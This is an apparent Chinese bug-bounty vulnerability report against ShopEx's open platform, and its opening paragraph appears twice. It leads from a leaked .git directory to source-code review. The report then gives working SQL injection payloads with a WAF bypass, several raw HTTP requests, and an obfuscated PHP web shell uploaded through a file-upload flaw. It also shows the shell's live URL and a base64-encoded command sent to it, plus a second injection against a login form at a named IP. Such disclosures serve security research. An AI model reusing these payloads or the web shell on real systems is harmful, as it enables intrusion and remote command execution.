### 简要描述: SQL注入. ### 详细说明: BBScan 扫到一个git信息泄露: ``` http://open.shopex.cn/.git/ ``` 使用rip-git.pl把源码下载下来. 源码审计发现一个sql注入: open.shopex.cn\core\application\controllers\docs.php: ``` /** * API接口搜索列表页 * * @access public * * @return void */ public function api_search($category_id){ $this->data['navigations'][] = array('name'=>'开发文档','url'=>''); $this->data['navigations'][] = array('name'=>'API文档','url'=>site_url('/docs/api_list/'.$category_id)); $platform_id = isset($_GET['platform_id'])?$_GET['platform_id']:0; $docs_keyword = isset($_GET['docs_keyword'])?trim(urldecode($_GET['docs_keyword'])):''; $method_type_id = isset($_GET['method_type_id'])?$_GET['method_type_id']:0; /** * * 开发文档页改变布局 */ $this->layout->Layout('doc_details'); /** * * 加载API列表模型,并获取API列表数据 */ $this->load->model('method_type_model'); $api_list_data_temp = $this->method_type_model->get_api_list_all(); foreach($api_list_data_temp as $k=>$v){ $api_list_data[$v['id']] = $v; } $this->data['api_list_data'] = $api_list_data; /**...
### 简要描述: SQL注入. ### 详细说明: BBScan 扫到一个git信息泄露: ``` http://open.shopex.cn/.git/ ``` 使用rip-git.pl把源码下载下来. 源码审计发现一个sql注入: open.shopex.cn\core\application\controllers\docs.php: ``` /** * API接口搜索列表页 * * @access public * * @return void */ public function api_search($category_id){ $this->data['navigations'][] = array('name'=>'开发文档','url'=>''); $this->data['navigations'][] = array('name'=>'API文档','url'=>site_url('/docs/api_list/'.$category_id)); $platform_id = isset($_GET['platform_id'])?$_GET['platform_id']:0; $docs_keyword = isset($_GET['docs_keyword'])?trim(urldecode($_GET['docs_keyword'])):''; $method_type_id = isset($_GET['method_type_id'])?$_GET['method_type_id']:0; /** * * 开发文档页改变布局 */ $this->layout->Layout('doc_details'); /** * * 加载API列表模型,并获取API列表数据 */ $this->load->model('method_type_model'); $api_list_data_temp = $this->method_type_model->get_api_list_all(); foreach($api_list_data_temp as $k=>$v){ $api_list_data[$v['id']] = $v; } $this->data['api_list_data'] = $api_list_data; /** * * 支持平台列表 */ $this->load->model('platform_model'); $platform_list = $this->platform_model->get_platform_list(); $this->data['platform_list'] = $platform_list; /** * * 条件过滤 */ $conditions = '1=1'; if($platform_id>0){ $conditions.= ' AND pm.platform_id='.$platform_id; } if($docs_keyword!=''){ $conditions.= ' AND (m.name like "%'.$docs_keyword.'%" OR m.introduction like "%'.$docs_keyword.'%")'; } /** * * 左边筛选使用 */ $this->load->model('method_model'); $filter_method_list = $this->method_model->get_method_search_list($conditions);//接口列表 $method_type_id_array = array(); foreach($filter_method_list as $k=>$v){ $method_type_id_array[] = $v['method_type_id']; } if($method_type_id>0){ $conditions.= ' AND mthm.method_type_id='.$method_type_id; } /** * * 加载API接口模型 */ $this->load->model('method_model'); $method_list_temp = $this->method_model->get_method_search_list($conditions);//接口列表 foreach($method_list_temp as $k=>$v){ $temp = isset($api_list_data[$v['method_type_id']])?$api_list_data[$v['method_type_id']]['name']:'temp'; $method_list_group[$temp][] = $v; } $this->data['method_list_group'] = $method_list_group; $this->data['method_type_id_array'] = $method_type_id_array; $this->data['docs_keyword'] = $docs_keyword; $this->data['platform_id'] = $platform_id; $this->data['category_id'] = $category_id; $this->data['method_type_id'] = $method_type_id;//当前列表ID $this->layout->view('docs/api_search',$this->data); } ``` 三个参数存在sql注入: ``` platform_id docs_keyword method_type_id ``` 搜一下发现已经提交过了: [WooYun: Shopex开放平台某处SQL注入](http://www.wooyun.org/bugs/wooyun-2014-088313) [WooYun: Shopex官方某平台存在SQL注入漏洞一枚](http://www.wooyun.org/bugs/wooyun-2015-0114559) [WooYun: ShopEx某分站存在注入](http://www.wooyun.org/bugs/wooyun-2015-0115779) 漏洞任没有修复,但上了waf. 程序是CI框架,默认过滤掉了参数中的utf-8字符,所以在关键字中插入一个%80就能绕过waf了。 ``` http://open.shopex.cn/docs/api_search/1?platform_id=1/extractvalue(1,concat%20(0x7e,us%80er(),0x3a,ver%80sion()))%23 ``` [<img src="https://images.seebug.org/upload/201512/122210195190a28293aef4521fe54577e9e384b6.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/122210195190a28293aef4521fe54577e9e384b6.png) [<img src="https://images.seebug.org/upload/201512/1222120536af2f1c1bdb613516cb2ca4d054da28.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/1222120536af2f1c1bdb613516cb2ca4d054da28.png) 继续翻代码,找到一处任意文件上传: open.shopex.cn\core\application\controllers\uploads.php: ``` class Uploads extends CI_Controller { /** * 首页图片上传 * * @access public */ public function home_img(){ if(empty($_FILES['image'])){ $this->_return_msg('fail','上传内容格式不对!'); } if(substr($_FILES['image']['type'],0,5)!='image'){ $this->_return_msg('fail','请确认上传的是图片!'); } $image_name = $_FILES['image']['name']; $image_name_exp = explode('.',$image_name); $image_name = date('YmdHis').mt_rand(0,1).'.'.$image_name_exp[1]; $uploadfile = FCPATH.'uploads/home_img/'.$image_name; move_uploaded_file($_FILES['image']['tmp_name'],$uploadfile); $data['img'] = base_url('/uploads/home_img/'.$image_name); $this->_return_msg('succ','成功',$data); }... ``` 利用php multipart/form-data 解析漏洞来绕过waf上传php shell: ``` POST /index.php/uploads/home_img HTTP/1.1 User-Agent: curl/7.33.0 Host: open.shopex.cn Accept: */* Proxy-Connection: Keep-Alive Content-Length: 341 Content-Type: multipart/form-data; boundary=----,xxoo ------,xxoo Content-Disposition: form-data; name="image"; filename="1.jpg" Content-Type: image/png ------ Content-Disposition: form-data; name="image"; filename="1.php" Content-Type: image/png <script language="php">@preg_replace('/./e','@'.str_rot13('riny').'(bas'.'e64_decode($_POST[c]))', 'x');</script> ------ ------,xxoo-- ``` shell: ``` http://open.shopex.cn/uploads/home_img/201512122130440.php ``` ``` POST /uploads/home_img/201512122130440.php HTTP/1.1 User-Agent: curl/7.33.0 Host: open.shopex.cn Accept: */* Proxy-Connection: Keep-Alive Content-Length: 34 Content-Type: application/x-www-form-urlencoded c=ZWNobyBgaWQ7cHdkO2xhc3QgLTIwYDs= ``` [<img src="https://images.seebug.org/upload/201512/1222175044b7a1af0175248b111c6bb3faaa0083.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/1222175044b7a1af0175248b111c6bb3faaa0083.png) 另外还有一个sql注入: ``` POST /index.php/passport/passport/login HTTP/1.1 Host: 122.144.135.142 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept-Language: zh-CN,zh;q=0.8 Cookie: PHPSESSID=368fe31461cc0ba9a3e38c0334145b35; CNZZDATA3868185=cnzz_eid%3D1466070748-1449902718-%26ntime%3D1449902718 Content-Length: 131 biz_id=&entid=')or updatexml(1,co%80ncat(0x7e,us%80er(),ver%80sion()),1)#&pwd=xx&auth_code=cqac&subOk=%E7%99%BB%E5%BD%95&logOk=true ``` ### 漏洞证明: [<img src="https://images.seebug.org/upload/201512/122210195190a28293aef4521fe54577e9e384b6.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/122210195190a28293aef4521fe54577e9e384b6.png) [<img src="https://images.seebug.org/upload/201512/1222120536af2f1c1bdb613516cb2ca4d054da28.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/1222120536af2f1c1bdb613516cb2ca4d054da28.png) [<img src="https://images.seebug.org/upload/201512/1222175044b7a1af0175248b111c6bb3faaa0083.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/1222175044b7a1af0175248b111c6bb3faaa0083.png)
